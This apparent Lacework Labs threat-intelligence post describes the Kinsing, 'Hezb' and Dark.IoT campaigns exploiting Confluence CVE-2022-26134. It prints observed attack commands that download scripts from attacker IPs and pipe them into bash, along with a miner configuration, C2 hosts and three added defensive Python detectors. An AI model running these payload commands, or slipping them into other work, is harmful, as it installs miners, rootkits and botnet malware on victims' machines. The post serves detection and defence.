Kinsing & Dark.IoT botnet among threats targeting CVE-2022-26134 - Lacework

Chris Hall - Cloud Security Researcher - Lacework Labs

June 7, 2022

Details regarding the recent Confluence OGNL (CVE-2022-26134) exploit were released to the public on June 3rd, 2022. Shortly following this, Lacework Labs began seeing multiple attacks in the wild from both uncategorized and named threats. While this was expected, there appears to be more widespread exploitation of CVE-2022-26134 compared to previous Confluence vulnerabilities.

As of this writing we have observed active exploitation by known cloud threat malware families such as Kinsing, “Hezb”, and the Dark.IoT botnet. This blog provides a current inventory of the top threats seen exploiting this latest Confluence vulnerability. Additional IOCs associated with this vulnerability are included in our GitHub repo.

Kinsing

Kinsing is often among the first threats to add a new exploit to its toolbox, and CVE-2022-26134 was no different. One interesting development was the use of a new malware host, 195.2.79.26, for the Kinsing installer. This is noteworthy because Kinsing usually leverages legacy infrastructure in its attacks. Observed payload commands for CVE-2022-26134:

/bin/sh -c wget -q -O - http://185.191.32.198/cf.sh | bash > /dev/null 2>&1

bash -c (curl -s 195.2.79.26/cf.sh||wget -q -O- 195.2.79.26/cf.sh)|bash

The initial payload cf.sh is currently not available on VirusTotal. However, it is a typical installer which downloads and runs the Kinsing H2miner malware as well as a userland rootkit, libsystem.so. This shared object is in turn loaded via LD_PRELOAD hijacking (MITRE ATT&CK T1574.006).

Hezb

Another threat, dubbed “Hezb” based on command line artifact data, was observed alongside Kinsing. This malware is relatively new and was reported in late May exploiting the WSO2 RCE (CVE-2022-29464) in the wild. Several malware components were observed, the first of which was an XMRig miner installed as “hezb”. Additional modules included a polkit exploit for privilege escalation as well as a zero-detection ELF payload named “kik”. The following table lists the observed artifacts and their descriptions.

CMDLINE artifact: curl -o hezb http://202.28.229.174/sys.x86_64
Description: Initial payload command – XMRig

CMDLINE artifact: hezb -o 199.247.0.216:80 -u 46HmQz11t8uN84P8xgThrQXSYm434VC7hhNR8be4QrGtM1Wa4cDH2GkJ2NNXZ6Dr4bYg6phNjHKYJ1QfpZRBFYW5V6qnRJN -p ap8 -k -B
Description: XMRig configuration command. The XMRig username was first seen in early May with various malware.

CMDLINE artifact: bash -c curl 202.28.229.174/root.sh|bash
Description: Second-stage installer. Attempts to run ap.sh via polkit privilege escalation: ./ko -o dom http://202.28.229.174/ko

CMDLINE artifact: curl -o kik http://202.28.229.174/kik
Description: Zero-detection ELF binary

Prior to the Hezb miner, another XMRig variant was observed and is believed, on the basis of shared infrastructure, to belong to the same group. This miner is a variant of xmrigCC, a modified version of XMRig with command-and-control (C2) capabilities. Payload command:

curl http://134.213.29.14:32953/2/c2/java.tar.gz --output /var/tmp/java.tar.gz

Static configurations:

"pools": [
  {
    "algo": null,
    "coin": null,
    "url": "91[.]217[.]81[.]162:443",
    "pass": "x",
    "rig-id": "con2022",
    "nicehash": false,
    "keepalive": false,
    "enabled": true,
    "tls": true,
    "tls-fingerprint": null,
    "daemon": false,
    "socks5": null,
    "self-select": null,
    "submit-to-origin": false
  }
],
"cc-client": {
  "enabled": true,
  "url": "91.217.81.162:80",
  "access-token": "sd893Lkhsdg81LKjgpqffss4KLjjsl",
  "use-tls": false,
  "use-remote-logging": true,
  "upload-config-on-start": true,
  "worker-id": null,
  "reboot-cmd": null,
  "update-interval-s": 60
},
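An added example, not code from the post or from the XMRig project: a small triage helper that parses the configuration quoted above (embedded here as JSON constructed from the page's values, with the pool "user" field absent as it is on the page), refangs the bracket-defanged pool address, and separates the mining pool from the xmrigCC C2 settings, whose presence is what distinguishes the fork from vanilla XMRig.

```python
import json
import re

# Pool and C2 settings constructed from the xmrigCC configuration quoted in this
# post; the pool "user" (wallet) field is not on the page, so it is absent here.
XMRIGCC_CONFIG = """{
  "pools": [{"algo": null, "coin": null, "url": "91[.]217[.]81[.]162:443",
             "pass": "x", "rig-id": "con2022", "nicehash": false,
             "keepalive": false, "enabled": true, "tls": true,
             "tls-fingerprint": null, "daemon": false, "socks5": null,
             "self-select": null, "submit-to-origin": false}],
  "cc-client": {"enabled": true, "url": "91.217.81.162:80",
                "access-token": "sd893Lkhsdg81LKjgpqffss4KLjjsl",
                "use-tls": false, "use-remote-logging": true,
                "upload-config-on-start": true, "worker-id": null,
                "reboot-cmd": null, "update-interval-s": 60}
}"""

def refang(value):
    """Turn a defanged indicator such as 91[.]217[.]81[.]162 back into a real address."""
    return re.sub(r"\[\.\]", ".", value)

def extract_indicators(config_text):
    """Pull the network indicators out of an XMRig or xmrigCC config.

    "pools" exists in both; a "cc-client" section marks the xmrigCC fork, and its
    keys (remote logging, config upload, reboot command) show what the operator
    can do to the host through the C2.
    """
    cfg = json.loads(config_text)
    result = {"pools": [], "cc": None}
    for pool in cfg.get("pools", []):
        if not pool.get("enabled", True):
            continue
        result["pools"].append({
            "url": refang(pool.get("url", "")),
            "user": pool.get("user"),        # None when the wallet was not captured
            "rig_id": pool.get("rig-id"),
            "tls": bool(pool.get("tls")),
        })
    cc = cfg.get("cc-client")
    if cc and cc.get("enabled"):
        result["cc"] = {
            "url": refang(cc.get("url", "")),
            "access_token": cc.get("access-token"),
            "remote_reboot": cc.get("reboot-cmd") is not None,
            "update_interval_s": cc.get("update-interval-s"),
        }
    return result
```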

Privilege Escalation via pwnkit (binary name: ko)

CVE-2021-4034, released earlier this year, allows privilege escalation via a bug in the SETUID application “polkit”. The aptly named “pwnkit” exploit was observed being distributed within droppers that take advantage of the most recent Confluence vulnerability. The image below shows the Ghidra decompilation of this utility, which aligns with many of the public proof-of-concept exploits for this vulnerability on GitHub.

Figure 1. Hezb component Ko

Post-Execution Payload – Kik

Kik is a statically linked, non-stripped 64-bit Golang ELF binary. The binary searches for specific values while excluding others and pipes the resulting values to “kill -9”. This runs in a while-true loop that prints “command executed successfully” to stdout.

Figure 2. Hezb component Kik

Dark.IoT

A unique Mirai variant, installed as “x”, was also downloaded from the host 136.144.41.171. Observed commands:

/bin/sh -c wget -q -O - 136.144.41.171/atl | sh > /dev/null 2>&1

wget 136.144.41.171/x
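As an added example (not code from the original post), the detection logic below flags the fetch-and-pipe-to-shell pattern and the download hosts this post reports for Kinsing, Hezb and Dark.IoT, run over constructed sample process command lines; the sample set, its benign control lines and the lower-confidence bare-IP heuristic are assumptions of the example.

```python
import re

# Constructed sample process command lines: the commands this post reports for
# Kinsing, Hezb and Dark.IoT, plus two benign lines that must not alert.
SAMPLE_CMDLINES = [
    "/bin/sh -c wget -q -O - http://185.191.32.198/cf.sh | bash > /dev/null 2>&1",
    "bash -c (curl -s 195.2.79.26/cf.sh||wget -q -O- 195.2.79.26/cf.sh)|bash",
    "curl -o hezb http://202.28.229.174/sys.x86_64",
    "bash -c curl 202.28.229.174/root.sh|bash",
    "/bin/sh -c wget -q -O - 136.144.41.171/atl | sh > /dev/null 2>&1",
    "curl -sS https://deb.debian.org/debian/dists/bullseye/Release -o /tmp/Release",
    "bash -c ls -la /var/atlassian/application-data/confluence",
]

# Download hosts this post attributes to Kinsing, Hezb and Dark.IoT.
KNOWN_HOSTS = {"185.191.32.198", "195.2.79.26", "202.28.229.174", "136.144.41.171"}

FETCH_TOOL = re.compile(r"\b(?:wget|curl)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/bin/)?(?:ba)?sh\b")
IPV4_IN_URL = re.compile(r"(?:https?://)?(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/")

def classify(cmdline):
    """Return the reasons a command line looks like a CVE-2022-26134 payload (empty if none)."""
    reasons = []
    fetch = FETCH_TOOL.search(cmdline) is not None
    if fetch and PIPE_TO_SHELL.search(cmdline):
        # fetch-and-pipe is also how some legitimate installers run; treat it as
        # medium confidence and let a host match raise it
        reasons.append("remote content piped directly into a shell")
    hosts = set(IPV4_IN_URL.findall(cmdline))
    hits = hosts & KNOWN_HOSTS
    if hits:
        reasons.append("download from host seen in CVE-2022-26134 exploitation: " + ", ".join(sorted(hits)))
    elif fetch and hosts:
        reasons.append("download from a bare IP address")
    return reasons

def scan(cmdlines):
    """Map each suspicious command line to its reasons; clean lines are omitted."""
    findings = {}
    for cmdline in cmdlines:
        reasons = classify(cmdline)
        if reasons:
            findings[cmdline] = reasons
    return findings

if __name__ == "__main__":
    for cmdline, reasons in scan(SAMPLE_CMDLINES).items():
        print(cmdline, "->", "; ".join(reasons))
```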

This malware is characterized by alternative DNS connections: it resolves several *.lib domains through custom DNS servers. The observed C2 hostnames, DNS servers and resolutions are listed below:

C2 host: tempest.lib
DNS servers: 94.247.43.254, 95.217.229.211, 162.243.19.47, 94.16.114.254, 194.36.144.87
Resolved IP: 62.4.23.97

C2 host: dragon.lib
DNS servers: 95.217.229.211, 162.243.19.47, 94.16.114.254
Resolved IP: 193.70.30.98

C2 host: blacknurse.lib
DNS servers: 144.76.157.242, 94.247.43.254, 194.36.144.87, 95.217.229.211
Resolved IP: 5.206.227.244

C2 host: babaroga.lib
DNS servers: 144.76.157.242, 94.16.114.254, 95.217.229.211, 162.243.19.47, 94.247.43.254
Resolved IP: 203.0.113.0
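An added example (not code from the post): a check over constructed DNS log lines that flags queries sent to resolvers outside an assumed approved set, any name under the .lib TLD (which does not exist in the public root), and the four C2 hostnames listed above; the log format, client addresses and approved resolvers are assumptions, while the resolver and answer addresses are taken from the table.

```python
# Resolvers the fleet is expected to use (hypothetical, for this example).
APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}
# C2 hostnames this post reports for the Dark.IoT sample.
DARK_IOT_HOSTS = {"tempest.lib", "dragon.lib", "blacknurse.lib", "babaroga.lib"}

# Constructed DNS log, one query per line:
# <timestamp> <client> <resolver> <query name> <answer>
SAMPLE_DNS_LOG = """\
2022-06-05T10:01:02Z 10.0.5.21 10.0.0.53 confluence.corp.example 10.0.7.8
2022-06-05T10:01:09Z 10.0.5.21 95.217.229.211 tempest.lib 62.4.23.97
2022-06-05T10:01:10Z 10.0.5.21 162.243.19.47 dragon.lib 193.70.30.98
2022-06-05T10:02:30Z 10.0.5.40 10.0.1.53 deb.debian.org 198.51.100.7
2022-06-05T10:03:00Z 10.0.5.40 10.0.1.53 updates.lib NXDOMAIN
"""

def check_dns_record(line):
    """Evaluate one log line; the returned "findings" list is empty when the record is clean."""
    ts, client, resolver, qname, answer = line.split()
    name = qname.lower().rstrip(".")
    findings = []
    if resolver not in APPROVED_RESOLVERS:
        # Dark.IoT bypasses the host's configured resolver and asks its own servers
        findings.append(f"query sent to non-approved resolver {resolver}")
    if name.rsplit(".", 1)[-1] == "lib":
        # .lib is not a delegated public TLD, so a normal resolver answers NXDOMAIN
        findings.append("query for a .lib name, a TLD that does not exist in the public root")
    if name in DARK_IOT_HOSTS:
        findings.append(f"{name} is a reported Dark.IoT C2 hostname")
    return {"ts": ts, "client": client, "resolver": resolver,
            "qname": name, "answer": answer, "findings": findings}

def scan_dns_log(text):
    """Return only the records that produced at least one finding."""
    records = (check_dns_record(l) for l in text.splitlines() if l.strip())
    return [r for r in records if r["findings"]]

if __name__ == "__main__":
    for rec in scan_dns_log(SAMPLE_DNS_LOG):
        print(rec["client"], rec["qname"], "->", "; ".join(rec["findings"]))
```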

This set of Mirai activity was reported in September 2021 targeting Realtek devices as part of the Dark.IoT botnet. Dark.IoT is a prolific botnet that has expanded its activity beyond IoT devices, for example with an Oracle WebLogic exploit and targeting of Azure Open Management Infrastructure (OMI).

Exploits involving Confluence are always popular among various threats, including those targeting the cloud. While Lacework Labs observed a lot of activity relative to other exploits, exposure is still low compared to the more impactful “coffee break” vulnerabilities such as those involving Log4j or Apache. For a complete list of IoCs observed in CVE-2022-26134 exploitation, refer to our GitHub. For more content like this, check us out on Twitter and LinkedIn!